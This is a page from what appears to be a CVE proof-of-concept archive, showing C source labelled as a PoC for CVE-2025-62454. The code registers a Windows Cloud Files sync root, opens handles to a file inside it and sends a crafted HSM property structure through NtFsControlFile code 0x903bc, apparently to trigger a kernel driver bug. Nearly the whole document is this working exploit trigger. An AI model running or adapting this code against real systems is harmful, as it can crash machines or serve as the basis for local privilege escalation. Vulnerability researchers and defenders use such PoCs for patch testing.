4837 Total CVEs
26 Years
GitHub
Home / 2025 / CVE-2025-62454
README.md
Rendering markdown...
POC / poc.c C
⬇ Raw GitHub ✕ Close 
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <direct.h>
#include <io.h>
#include <winsock2.h>
#include <windows.h>
#include <cfapi.h>
#include <tchar.h>
#include <winternl.h>
#include <fileapi.h>
#include <wchar.h>
#include <ctype.h>
#include <fltuser.h>
#pragma comment(lib, "fltLib.lib")
#pragma comment(lib, "CldApi.lib")
#pragma comment(lib, "ntdll.lib")
static HMODULE _g_ntdll = LoadLibraryA("ntdll.dll");

typedef long long (WINAPI* PNtFsControlFile)(...);

PNtFsControlFile _NtFsControlFile = (PNtFsControlFile)GetProcAddress(_g_ntdll, "NtFsControlFile");

typedef long long (WINAPI* PNtCreateFile)(...);

PNtCreateFile _NtCreateFile = (PNtCreateFile)GetProcAddress(_g_ntdll, "NtCreateFile");

static CF_CALLBACK_REGISTRATION callbackTable[] = {
    CF_CALLBACK_REGISTRATION_END
};

#define COUNT 5
HANDLE r[COUNT] = { };

int main(void)
{
    LPCWSTR SyncRootPath = L"C:\\Users\\Public\\SYNC_ROOT_5";
    CF_CONNECTION_KEY key = {};
    CF_SYNC_REGISTRATION reg = {};
    reg.StructSize = sizeof(reg);
    reg.ProviderName = L"TestProvider";
    reg.ProviderVersion = L"1234";
    reg.ProviderId = { 0xB196E670, 0x59C7, 0x4D41, {0} };

    CF_SYNC_POLICIES pol = {};
    pol.StructSize = sizeof(pol);
    pol.HardLink = CF_HARDLINK_POLICY_ALLOWED;
    pol.InSync = CF_INSYNC_POLICY_NONE;
    pol.Hydration.Primary = CF_HYDRATION_POLICY_PARTIAL;
    pol.Population.Primary = CF_POPULATION_POLICY_PARTIAL;

    CreateDirectory(SyncRootPath, NULL);
    CfRegisterSyncRoot(SyncRootPath, &reg, &pol, CF_REGISTER_FLAG_NONE);
    CfConnectSyncRoot(SyncRootPath, callbackTable, NULL, CF_CONNECT_FLAG_NONE, &key);

    for (int i = 0; i < COUNT; i++) {
        IO_STATUS_BLOCK iosb = {};
        OBJECT_ATTRIBUTES objAttr = {};
        UNICODE_STRING objName = {};
        RtlInitUnicodeString(&objName, L"\\??\\C:\\Users\\Public\\SYNC_ROOT_5\\testfile_0");
        InitializeObjectAttributes(&objAttr, &objName, 0x40, 0, NULL);
        _NtCreateFile(&r[i], GENERIC_READ | GENERIC_WRITE, &objAttr, &iosb, NULL, 0,
            FILE_SHARE_READ | FILE_SHARE_WRITE, FILE_OPEN_IF,
            FILE_DIRECTORY_FILE, NULL, 0);
    }

    typedef struct HSM_PROPERTY_ENTRY {
        uint32_t PropertyId;
        uint32_t Flags;
        uint64_t Value;
        uint32_t ValueSize;
        uint32_t Reserved;
    };

    typedef struct HSM_PROPERTY_OPERATION {
        uint32_t ReparseTag;
        uint32_t Operation;
        uint32_t Exclusive;
        uint32_t Reserved;
        uint32_t HeaderSize;
        uint32_t PropertyCount;
        uint64_t CorrelationKey;
        HSM_PROPERTY_ENTRY Properties[5];
    };
    HSM_PROPERTY_OPERATION p;
    memset(&p, 0, sizeof(p));
    p.ReparseTag = 0x9000001A;
    p.Operation = 0xC0000021;
    p.Exclusive = 0;
    p.HeaderSize = 0x20;
    p.PropertyCount = 1;
    p.CorrelationKey = 0x1234;
    p.Properties[0].PropertyId = 0x999932a0;

    for (int i = 0; i < COUNT; i++) {
        IO_STATUS_BLOCK isb;
        _NtFsControlFile(r[i], NULL, NULL, NULL, &isb, 0x903bc, &p, sizeof(p), NULL, NULL);
    }

    return 0;
}